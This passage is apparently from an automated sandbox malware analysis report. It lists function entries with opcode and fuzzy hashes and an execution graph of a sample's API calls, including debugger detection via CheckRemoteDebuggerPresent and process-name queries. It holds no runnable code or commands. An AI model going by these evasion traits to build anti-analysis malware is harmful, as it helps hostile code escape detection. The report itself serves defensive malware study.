                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b68d244a520806525771929292c521eb3bffdd07bdd53ae6334bea963514538b
                                                                                            • Instruction ID: f17a9e0b185b08eed4e5d24df24484327313d715397fcc6e8d5b16c0277c5828
                                                                                            • Opcode Fuzzy Hash: b68d244a520806525771929292c521eb3bffdd07bdd53ae6334bea963514538b
                                                                                            • Instruction Fuzzy Hash: 41E06D61B1C81E8BEB48FE24C4542B933A1EB54310F118279C51EE32E5DE28AE128780
                                                                                            Function 00007FFB4B297A04 Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bc6c80e36a5eb852f7a9d7f1fd168a2c037f331cad622975277a71c67b3e0944
                                                                                            • Instruction ID: 51f484acbb5f03c615e4f869c488f2d8c6e800ec87d4a969d9f7e71dd582b68b
                                                                                            • Opcode Fuzzy Hash: bc6c80e36a5eb852f7a9d7f1fd168a2c037f331cad622975277a71c67b3e0944
                                                                                            • Instruction Fuzzy Hash: 5FE09A65B0C90B8BF709BE20C8502F926A09B04310F108235C91EA32E5CD1CEA1182A2
                                                                                            Function 00007FFB4B2911FD Relevance: .0, Instructions: 17COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 420795c9bfb2611f3958ed05bc99322d5241cd2e6843f4e2b7e820551352a973
                                                                                            • Instruction ID: b764d3fcd767361c87b22c5aef2ac03cbda5066726bbf888cfa05bbcf75517be
                                                                                            • Opcode Fuzzy Hash: 420795c9bfb2611f3958ed05bc99322d5241cd2e6843f4e2b7e820551352a973
                                                                                            • Instruction Fuzzy Hash: 77E04F74F0810EDBE700FFA5C9445BEB7B0FB04311F008636C529A2290DB7865408B80
                                                                                            Function 00007FFB4B29460B Relevance: .0, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f6cea79fb03d8aaba92056e64b064c3d159e6d62829f6800d712857dfae6f2f9
                                                                                            • Instruction ID: 20fcc9c52b475d7854ec0b5aedbf027fb02a7fd98c047d14c509e43572154d2d
                                                                                            • Opcode Fuzzy Hash: f6cea79fb03d8aaba92056e64b064c3d159e6d62829f6800d712857dfae6f2f9
                                                                                            • Instruction Fuzzy Hash: C3D05E72B0C80D8BE660BE28C554AAD36A2DB95320F158736C01EC72E1CD28B5510640
                                                                                            Function 00007FFB4B29A8CE Relevance: .0, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 168fa722d6454d940f254db911416e83be310e893d78ae11e623bd6c0f1ca228
                                                                                            • Instruction ID: 386f191d6fca456f41cf6a3f59bfbab13908536f6535845f238bcc4ce494059a
                                                                                            • Opcode Fuzzy Hash: 168fa722d6454d940f254db911416e83be310e893d78ae11e623bd6c0f1ca228
                                                                                            • Instruction Fuzzy Hash: AAD01764F1C81D4FDB80FE28C4102A926F2BB98301F2081B4850EE3299CE34AD118B80
                                                                                            Function 00007FFB4B295808 Relevance: .0, Instructions: 12COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d79cdfadace948bdc2f5f6bc7e5398ddd9d0ec97d1b72b907e26ee6f016c195f
                                                                                            • Instruction ID: 843557465a2ab9849b1ca43100706553a1a9331aaf38f789e852c2fe2c794191
                                                                                            • Opcode Fuzzy Hash: d79cdfadace948bdc2f5f6bc7e5398ddd9d0ec97d1b72b907e26ee6f016c195f
                                                                                            • Instruction Fuzzy Hash: 05C01270B0C54E4FD645FD18D540A6936B1FB48300F505430D50DD314ACD38EC528780
                                                                                            Function 00007FFB4B299132 Relevance: .0, Instructions: 12COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4425a2d9722c709d0be89ef0e740e8379e5b1b0ae2c159834b17e7a0872b81af
                                                                                            • Instruction ID: da89297de2182e443ba274a1c79acde0a3aa0b2e2c05586c3536ca519f2afd15
                                                                                            • Opcode Fuzzy Hash: 4425a2d9722c709d0be89ef0e740e8379e5b1b0ae2c159834b17e7a0872b81af
                                                                                            • Instruction Fuzzy Hash: 44D0C9A1F2C50E5FDB98FF38C5543696AF1BF48301F0145B8910EE32A2EE386910CB00
                                                                                            Function 00007FFB4B29B5DF Relevance: .0, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f6c6adf10dd4c446877591becfd06bbdb711a8ac46d02128919f4b24cf77e62a
                                                                                            • Instruction ID: f8ca761befb000f6929bb2ecfce6aa0f002e6fc6d8ab5339bde1cdd3af66bdd6
                                                                                            • Opcode Fuzzy Hash: f6c6adf10dd4c446877591becfd06bbdb711a8ac46d02128919f4b24cf77e62a
                                                                                            • Instruction Fuzzy Hash: 1DD0C970D0D5198FDBE1EB24C4407A876F1EB08300F5011F4800DD3659CA39AE808F41
                                                                                            Function 00007FFB4B299048 Relevance: .0, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5b17eddefa50373bbbc9b4d2b7ea0d35bc4c16bc0b807f834e27746b240969cb
                                                                                            • Instruction ID: 60c66a0ed148401bffbc264f486f8cf6f962beaa05fa3ad77503048ae55760e9
                                                                                            • Opcode Fuzzy Hash: 5b17eddefa50373bbbc9b4d2b7ea0d35bc4c16bc0b807f834e27746b240969cb
                                                                                            • Instruction Fuzzy Hash: 45C00274E1C42D8FDBA0FB68C9427ACAAF5FF58300F2181B5814EE3295DD346D829B80
                                                                                            Function 00007FFB4B298791 Relevance: .0, Instructions: 8COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ad4f5692c19c5a9ca737afbd5ff8277f7c0a6e96f9cb75a73f1f4410116aecca
                                                                                            • Instruction ID: c51cbcbd68ac6b8c6dd9a408ea97a0bc2eb9f1ec681f60e1b7e64a09a32224b5
                                                                                            • Opcode Fuzzy Hash: ad4f5692c19c5a9ca737afbd5ff8277f7c0a6e96f9cb75a73f1f4410116aecca
                                                                                            • Instruction Fuzzy Hash: 35C08C24E0C01A46EB10FA25C8402BD36B1AF5C380F0580F0800D63285C83C7E409FC0
                                                                                            Function 00007FFB4B294C0C Relevance: .0, Instructions: 6COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0771dade2eb43007db5242c7a72e28bdea402b2180515eb55519f50d6529d743
                                                                                            • Instruction ID: 54bad5f5182989efd93c3516d8268f164eafca8868611723a5b918240da41cf3
                                                                                            • Opcode Fuzzy Hash: 0771dade2eb43007db5242c7a72e28bdea402b2180515eb55519f50d6529d743
                                                                                            • Instruction Fuzzy Hash: F7B0926070C40D4AE260F978C1403A619A18F8A308F208034820DC6AE2C85928009251
                                                                                            Function 00007FFB4B2907E8 Relevance: .0, Instructions: 3COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9d778bb719777db97dcf1bd0179456d0c40156941486531054ad7865c8ae82e8
                                                                                            • Instruction ID: f9f2e32f27f1979b77fafc91cd46e0196ff13f91302d0e9294678fb6f49b639b
                                                                                            • Opcode Fuzzy Hash: 9d778bb719777db97dcf1bd0179456d0c40156941486531054ad7865c8ae82e8
                                                                                            • Instruction Fuzzy Hash: 7390026240503186D612E978E4D26D673545F0572870841A1D44D49147E96460814555

                                                                                            Non-executed Functions

                                                                                            Function 00007FFB4B292437 Relevance: .5, Instructions: 481COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c53f5435d9ea5834f811f302a0da92d3a0d6e24bdf8349151bf11353ba2abfc1
                                                                                            • Instruction ID: c4fad671c1822050587b9828485c1958a5070940065bad22333e659261560f19
                                                                                            • Opcode Fuzzy Hash: c53f5435d9ea5834f811f302a0da92d3a0d6e24bdf8349151bf11353ba2abfc1
                                                                                            • Instruction Fuzzy Hash: 25C1E2ABB1962686D6227A7EF4815E9BB14DFC0737B044AB7D38DCD043992864CE46F0
                                                                                            Function 00007FFB4B292470 Relevance: .4, Instructions: 424COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 08b556e90a5fe4092fffa7f498ebe12ed49b79041273588319c0069313706185
                                                                                            • Instruction ID: 27165b63eec801c6b08719c3bcd0535fd635be8fb443be340eed77944bc0518d
                                                                                            • Opcode Fuzzy Hash: 08b556e90a5fe4092fffa7f498ebe12ed49b79041273588319c0069313706185
                                                                                            • Instruction Fuzzy Hash: 3EB1E36BB0953685D6227ABEF4425EEBB14DFC4737B044A77D38DCD043992824CA46F4
                                                                                            Function 00007FFB4B292488 Relevance: .4, Instructions: 411COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be4cf8e030c330140b86ca5092df0369ae4fc43b6f2d4eb6b29c8d13553fc3e3
                                                                                            • Instruction ID: 9a8b9b864958e12d5bea8acaf80a68dd84f1114b8103616329cc78c09a7bdf9e
                                                                                            • Opcode Fuzzy Hash: be4cf8e030c330140b86ca5092df0369ae4fc43b6f2d4eb6b29c8d13553fc3e3
                                                                                            • Instruction Fuzzy Hash: 4CA1E26BB095368596227ABEF4425EEB714DFC4B37B044AB7D38DCD043992824CA46F4
                                                                                            Function 00007FFB4B292490 Relevance: .4, Instructions: 405COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 22ed1a0f7a90d2d61e647de901f171d6d117bb52b9e9ae33645ba3a2f6c578e3
                                                                                            • Instruction ID: 26f7046b3c7f2d6f1290120ab1c2fe8a309c1912d9f3a251c4ac0fe27a7865c9
                                                                                            • Opcode Fuzzy Hash: 22ed1a0f7a90d2d61e647de901f171d6d117bb52b9e9ae33645ba3a2f6c578e3
                                                                                            • Instruction Fuzzy Hash: 82A1E06BB095368596227ABEF4425EEBB14DFC4B37B044AB7D38DCD043992824CA46F4

                                                                                            Execution Graph

                                                                                            Execution Coverage:15.3%
                                                                                            Dynamic/Decrypted Code Coverage:24.5%
                                                                                            Signature Coverage:2.7%
                                                                                            Total number of Nodes:110
                                                                                            Total number of Limit Nodes:13
                                                                                            execution_graph 12246 7ffb4b292003 12248 7ffb4b292007 12246->12248 12247 7ffb4b2836d0 GetSystemMetrics 12247->12248 12248->12247 12249 7ffb4b2920b9 12248->12249 12293 7ffb4b29b5e4 12296 7ffb4b29b521 12293->12296 12295 7ffb4b29b62f 12296->12295 12297 7ffb4b2a9d4e QueryFullProcessImageNameA 12296->12297 12298 7ffb4b2a9da4 12297->12298 12174 7ffb4b289235 12177 7ffb4b28923f 12174->12177 12175 7ffb4b289203 12176 7ffb4b29285e 12182 7ffb4b2928c8 12176->12182 12177->12175 12177->12176 12179 7ffb4b2928b3 12177->12179 12181 7ffb4b2928c8 GetSystemMetrics 12179->12181 12180 7ffb4b2928b1 12181->12180 12183 7ffb4b2928e6 12182->12183 12184 7ffb4b2929b9 GetSystemMetrics 12183->12184 12185 7ffb4b2929e8 12184->12185 12185->12180 12260 7ffb4b2926f5 12262 7ffb4b292713 12260->12262 12261 7ffb4b29285e 12263 7ffb4b2928c8 GetSystemMetrics 12261->12263 12262->12261 12264 7ffb4b2928b3 12262->12264 12265 7ffb4b2928b1 12263->12265 12266 7ffb4b2928c8 GetSystemMetrics 12264->12266 12266->12265 12186 7ffb4b28722d 12188 7ffb4b2871f0 12186->12188 12188->12186 12189 7ffb4b287260 12188->12189 12190 7ffb4b285c40 12188->12190 12191 7ffb4b285c45 12190->12191 12192 7ffb4b29285e 12191->12192 12194 7ffb4b2928b3 12191->12194 12193 7ffb4b2928c8 GetSystemMetrics 12192->12193 12195 7ffb4b2928b1 12193->12195 12196 7ffb4b2928c8 GetSystemMetrics 12194->12196 12196->12195 12197 7ffb4b292928 12198 7ffb4b29292f 12197->12198 12199 7ffb4b2929b9 GetSystemMetrics 12198->12199 12200 7ffb4b2929e8 12199->12200 12205 7ffb4b29207a 12206 7ffb4b292017 12205->12206 12208 7ffb4b2920b9 12206->12208 12209 7ffb4b2836d0 12206->12209 12210 7ffb4b2922e0 12209->12210 12214 7ffb4b292332 12210->12214 12233 7ffb4b289220 12210->12233 12212 7ffb4b292347 12226 7ffb4b289208 12212->12226 12214->12212 12219 7ffb4b285c48 12214->12219 12216 7ffb4b29257c 12217 7ffb4b289210 GetSystemMetrics 12216->12217 12218 7ffb4b292644 12216->12218 12217->12218 12218->12206 12221 7ffb4b2927e0 12219->12221 12220 7ffb4b29285e 12222 7ffb4b2928c8 GetSystemMetrics 12220->12222 12221->12220 12223 7ffb4b2928b3 12221->12223 12224 7ffb4b2928b1 12222->12224 12225 7ffb4b2928c8 GetSystemMetrics 12223->12225 12225->12224 12228 7ffb4b292720 12226->12228 12227 7ffb4b29285e 12229 7ffb4b2928c8 GetSystemMetrics 12227->12229 12228->12227 12230 7ffb4b2928b3 12228->12230 12231 7ffb4b2928b1 12229->12231 12232 7ffb4b2928c8 GetSystemMetrics 12230->12232 12232->12231 12234 7ffb4b2924e0 12233->12234 12235 7ffb4b289208 GetSystemMetrics 12234->12235 12236 7ffb4b29257c 12235->12236 12238 7ffb4b292644 12236->12238 12239 7ffb4b289210 12236->12239 12238->12214 12241 7ffb4b2927a0 12239->12241 12240 7ffb4b29285e 12242 7ffb4b2928c8 GetSystemMetrics 12240->12242 12241->12240 12243 7ffb4b2928b3 12241->12243 12244 7ffb4b2928b1 12242->12244 12245 7ffb4b2928c8 GetSystemMetrics 12243->12245 12245->12244 12172 7ffb4b2a9d4e QueryFullProcessImageNameA 12173 7ffb4b2a9da4 12172->12173 12250 7ffb4b2922bd 12251 7ffb4b2922df 12250->12251 12252 7ffb4b289220 GetSystemMetrics 12251->12252 12255 7ffb4b292332 12251->12255 12252->12255 12253 7ffb4b292347 12254 7ffb4b289208 GetSystemMetrics 12253->12254 12257 7ffb4b29257c 12254->12257 12255->12253 12256 7ffb4b285c48 GetSystemMetrics 12255->12256 12256->12253 12258 7ffb4b289210 GetSystemMetrics 12257->12258 12259 7ffb4b292644 12257->12259 12258->12259 12201 7ffb4b297d00 12202 7ffb4b297d0f CheckRemoteDebuggerPresent 12201->12202 12204 7ffb4b297daf 12202->12204 12299 7ffb4b29b55f 12300 7ffb4b2a9d4e QueryFullProcessImageNameA 12299->12300 12301 7ffb4b29b521 12300->12301 12301->12299 12302 7ffb4b29b62f 12301->12302 12267 7ffb4b292392 12280 7ffb4b2836d8 12267->12280 12281 7ffb4b292520 12280->12281 12282 7ffb4b289208 GetSystemMetrics 12281->12282 12284 7ffb4b29257c 12282->12284 12283 7ffb4b29239b 12286 7ffb4b289200 12283->12286 12284->12283 12285 7ffb4b289210 GetSystemMetrics 12284->12285 12285->12283 12288 7ffb4b292760 12286->12288 12287 7ffb4b29285e 12289 7ffb4b2928c8 GetSystemMetrics 12287->12289 12288->12287 12290 7ffb4b2928b3 12288->12290 12291 7ffb4b2928b1 12289->12291 12292 7ffb4b2928c8 GetSystemMetrics 12290->12292 12292->12291

                                                                                            Executed Functions

                                                                                            Function 00007FFB4B297D00 Relevance: 1.8, APIs: 1, Instructions: 270COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 929 7ffb4b297d00-7ffb4b297dad CheckRemoteDebuggerPresent 933 7ffb4b297db5-7ffb4b297e01 929->933 934 7ffb4b297daf 929->934 936 7ffb4b297e03-7ffb4b297e0c 933->936 937 7ffb4b297e0f-7ffb4b297e90 933->937 934->933 936->937 941 7ffb4b297e96-7ffb4b297ea1 937->941 942 7ffb4b297ea3 941->942 943 7ffb4b297ea9-7ffb4b297ee3 941->943 942->943 945 7ffb4b297ee5-7ffb4b297eed 943->945 946 7ffb4b297eee-7ffb4b297f31 943->946 945->946
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1674603735.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffb4b280000_d3yngi1q.jbxd
                                                                                            Similarity
                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                            • String ID:
                                                                                            • API String ID: 3662101638-0
                                                                                            • Opcode ID: c62681f7b9e7452ee562c8aea94e83ada4c1947d3a19ca654fe869728fa34c15
                                                                                            • Instruction ID: eaa6e6376a08b2ff026ffc3825b01605976b001e5ba7bb361937ba6b6e3e7cbd
                                                                                            • Opcode Fuzzy Hash: c62681f7b9e7452ee562c8aea94e83ada4c1947d3a19ca654fe869728fa34c15
                                                                                            • Instruction Fuzzy Hash: DE81077190D7898FDB0ADB68C8456E9BFF0FF56321F0442ABD089D71A3CB646846C791
                                                                                            Function 00007FFB4B2928C8 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1027 7ffb4b2928c8-7ffb4b2928e4 1028 7ffb4b2928e6-7ffb4b2928ef 1027->1028 1029 7ffb4b2928f0-7ffb4b292915 1027->1029 1028->1029 1030 7ffb4b292917 1029->1030 1031 7ffb4b292918-7ffb4b292953 1029->1031 1030->1031 1034 7ffb4b29295a-7ffb4b29296b call 7ffb4b28b9d0 1031->1034 1036 7ffb4b292970-7ffb4b292972 1034->1036 1037 7ffb4b292974 1036->1037 1038 7ffb4b29297b-7ffb4b29297d 1036->1038 1037->1038 1039 7ffb4b292985-7ffb4b292996 call 7ffb4b291f10 call 7ffb4b291f20 1038->1039 1043 7ffb4b29299b-7ffb4b29299f 1039->1043 1044 7ffb4b2929a8-7ffb4b2929b7 1043->1044 1045 7ffb4b2929a1 1043->1045 1046 7ffb4b2929b9-7ffb4b2929e6 GetSystemMetrics 1044->1046 1045->1044 1047 7ffb4b2929e8 1046->1047 1048 7ffb4b2929ee-7ffb4b2929f8 1046->1048 1047->1048 1049 7ffb4b2929fa 1048->1049 1050 7ffb4b292a01-7ffb4b292a06 call 7ffb4b291f30 1048->1050 1049->1050 1052 7ffb4b292a0b-7ffb4b292a0d 1050->1052 1053 7ffb4b292a16 call 7ffb4b28b9c0 1052->1053 1054 7ffb4b292a0f 1052->1054 1056 7ffb4b292a1b-7ffb4b292a1d 1053->1056 1054->1053 1057 7ffb4b292a26 call 7ffb4b28b9d8 1056->1057 1058 7ffb4b292a1f 1056->1058 1060 7ffb4b292a2b-7ffb4b292a2d 1057->1060 1058->1057 1061 7ffb4b292a36-7ffb4b292a4a 1060->1061 1062 7ffb4b292a2f 1060->1062 1062->1061
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1674603735.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffb4b280000_d3yngi1q.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem
                                                                                            • String ID:
                                                                                            • API String ID: 4116985748-0
                                                                                            • Opcode ID: 180240d131ea70be93157e614c85ae016df593fd1bcd15b73c795e2aec3ea04c
                                                                                            • Instruction ID: ea722061e5d8b020ada02df7bbfcccfb4376c05c086a53ef7eca495c407788ef
                                                                                            • Opcode Fuzzy Hash: 180240d131ea70be93157e614c85ae016df593fd1bcd15b73c795e2aec3ea04c
                                                                                            • Instruction Fuzzy Hash: 1B5104B190D64D4EEB6ABF74C8066FA7BA0EF06310F04417EE44EC21E3CE29A406C751
                                                                                            Function 00007FFB4B292928 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1091 7ffb4b292928-7ffb4b292972 call 7ffb4b28b9d0 1096 7ffb4b292974 1091->1096 1097 7ffb4b29297b-7ffb4b29299f call 7ffb4b291f10 call 7ffb4b291f20 1091->1097 1096->1097 1103 7ffb4b2929a8-7ffb4b2929e6 GetSystemMetrics 1097->1103 1104 7ffb4b2929a1 1097->1104 1106 7ffb4b2929e8 1103->1106 1107 7ffb4b2929ee-7ffb4b2929f8 1103->1107 1104->1103 1106->1107 1108 7ffb4b2929fa 1107->1108 1109 7ffb4b292a01-7ffb4b292a0d call 7ffb4b291f30 1107->1109 1108->1109 1112 7ffb4b292a16-7ffb4b292a1d call 7ffb4b28b9c0 1109->1112 1113 7ffb4b292a0f 1109->1113 1116 7ffb4b292a26 call 7ffb4b28b9d8 1112->1116 1117 7ffb4b292a1f 1112->1117 1113->1112 1119 7ffb4b292a2b-7ffb4b292a2d 1116->1119 1117->1116 1120 7ffb4b292a36-7ffb4b292a4a 1119->1120 1121 7ffb4b292a2f 1119->1121 1121->1120
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1674603735.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffb4b280000_d3yngi1q.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem
                                                                                            • String ID:
                                                                                            • API String ID: 4116985748-0
                                                                                            • Opcode ID: b58a43656d5a049c8514fc1fc9c9efc728b2869c2493b849fefa2cc56c330f3e
                                                                                            • Instruction ID: fbad70fb888af90319842758f48427b9c91e8634347f2f687ed66ed84f0c4060
                                                                                            • Opcode Fuzzy Hash: b58a43656d5a049c8514fc1fc9c9efc728b2869c2493b849fefa2cc56c330f3e
                                                                                            • Instruction Fuzzy Hash: 4C3182B1A0C64D5EEFAABF78C5067FA7AA0EF05310F04457EE54ED2192DE29A4058641
                                                                                            Function 00007FFB4B2A9D4E Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1674603735.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffb4b280000_d3yngi1q.jbxd
                                                                                            Similarity
                                                                                            • API ID: FullImageNameProcessQuery
                                                                                            • String ID:
                                                                                            • API String ID: 3578328331-0
                                                                                            • Opcode ID: 8043b8f3d9e2f8f0284f543c67e96bc35841bfd49e28ed795525f72d64f5acae
                                                                                            • Instruction ID: 897530e2ba1cba47c19b4244c2cf8b52c5c28e38dd54bb7def8f68b62f676b0c
                                                                                            • Opcode Fuzzy Hash: 8043b8f3d9e2f8f0284f543c67e96bc35841bfd49e28ed795525f72d64f5acae
                                                                                            • Instruction Fuzzy Hash: 5F31A23020C68C8FDB68EF28D8857E877D1FF59311F10826AD84DC7292CB71A841CB81

                                                                                            Executed Functions

                                                                                            Function 00007FFB4B2B27F6 Relevance: 2.7, Strings: 2, Instructions: 220COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
